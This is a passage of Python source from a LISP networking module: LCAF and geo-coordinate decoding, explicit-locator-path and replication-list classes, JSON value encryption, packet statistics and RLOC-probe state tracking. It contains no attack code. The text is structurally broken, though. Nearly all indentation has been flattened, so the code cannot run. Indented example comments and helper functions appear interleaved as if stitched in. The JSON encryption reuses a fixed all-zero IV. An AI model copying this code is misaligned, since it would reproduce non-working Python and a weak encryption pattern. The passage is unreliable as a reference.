if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
        # Get AFI and source address. Validate that there is enough length
        # and there are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
        # Get AFI and group address. Validate that there is enough length
        # and there are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
        addr_length = group.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
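    #
    # For example, a 3-node ELP might print as "1.1.1.1(rps), *2.2.2.2(Rps),
    # 3.3.3.3(RPs)": "*" marks the node this system forwards to, "x" would
    # mark this system as the last hop, and the letters show eid ("r")
    # versus RLOC ("R"), probe requested ("P") or not ("p"), and strict
    # ("S") or not ("s").
    #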
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
        # If we did not find a match, this is possibly an ITR. We need to give
        # it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
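    #
    # For example, parse_geo_string("37-24-30-N-122-5-12-W/50") stores
    # latitude -37 (negative means North), lat_mins 24, lat_secs 30,
    # longitude 122 (positive means West), long_mins 5, long_secs 12, no
    # altitude (-1), and radius 50 (kilometers, as compared by
    # point_in_circle()).
    #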
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
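    #
    # A worked example, continuing the geo-point above: latitude -37-24-30
    # (North) becomes 37 + (24*60 + 30)/3600 = +37.4083 and longitude
    # 122-5-12 (West) becomes -(122 + (5*60 + 12)/3600) = -122.0867, the
    # usual north-positive/west-negative decimal-degree convention.
    #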
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
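#
# Illustrative sketch, not part of the original module: round-trip a
# geo-coordinate through lisp_geo. parse_geo_string() accepts strings of
# the form "[<iid>]d-m-s-{N|S}-d-m-s-{E|W}[-altitude][/radius]";
# print_geo() rebuilds that string and dms_to_decimal() returns
# conventional signed decimal degrees (North and East positive, since
# the stored sign convention is inverted). The name "example-geo" and
# the coordinates are hypothetical.
#
def lisp_geo_example():
    geo = lisp_geo("example-geo")
    if (geo.parse_geo_string("37-24-17-N-122-4-46-W-10/5") == False):
        return(None)
    #endif
    return(geo.print_geo(), geo.dms_to_decimal())
#enddef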
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
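#
# Illustrative sketch, not part of the original module: the level
# selection performed by lisp_rle.build_forwarding_list(), mirrored on
# plain integers so the rule can be read in isolation. A replicator
# forwards to the first level above its own; a node with no local RLE
# address (an ITR) ingresses at level 0 (the real code also accepts
# level 128 in that case). Assumes levels are sorted ascending, as they
# are in an RLE encoding.
#
def rle_example_select_level(sorted_levels, local_level):
    if (local_level == None): return(0)
    for level in sorted_levels:
        if (level > local_level): return(level)
    #endfor
    return(local_level)
#enddef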
class lisp_json():
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
self.json_name = name
self.json_string = string
self.json_encrypted = False
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
        # If the LISP site-eid is not configured to encrypt the JSON, then
        # store it in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = lisp_ms_json_keys.keys()[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
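#
# Illustrative sketch, not part of the original module: round-trip a
# JSON string through encrypt_json()/decrypt_json(). ChaCha is a stream
# cipher, so applying the same keystream twice restores the plaintext.
# The key "example-key" is hypothetical and string values are assumed.
# Compare via json.loads() since key order can change across dump/load.
#
def lisp_json_example():
    js = lisp_json("example-entry", '{"a-key": "a-value"}')
    js.json_key_id = 0
    js.json_key = "example-key"
    plaintext = js.json_string
    js.encrypt_json()
    ciphertext = js.json_string
    js.decrypt_json()
    return(plaintext != ciphertext and
        json.loads(plaintext) == json.loads(js.json_string))
#enddef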
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
            count = count[0:-12] + "." + count[-12:-9] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
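#
# Illustrative sketch, not part of the original module: account for a
# hypothetical 1500-byte packet and show how normalize() renders large
# counters for display ("1.2M" style).
#
def lisp_stats_example():
    stats = lisp_stats()
    stats.increment(1500)
    return(stats.recent_packet_sec(), stats.normalize(1200000))
#enddef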
#
# ETR/RTR decapsulation total packet and error stats. Anytime a new
# lisp_packet.packet_error value is added, a matching key string must be
# added to this dictionary.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This is a locator-record definition as defined in the LISP RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
            hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
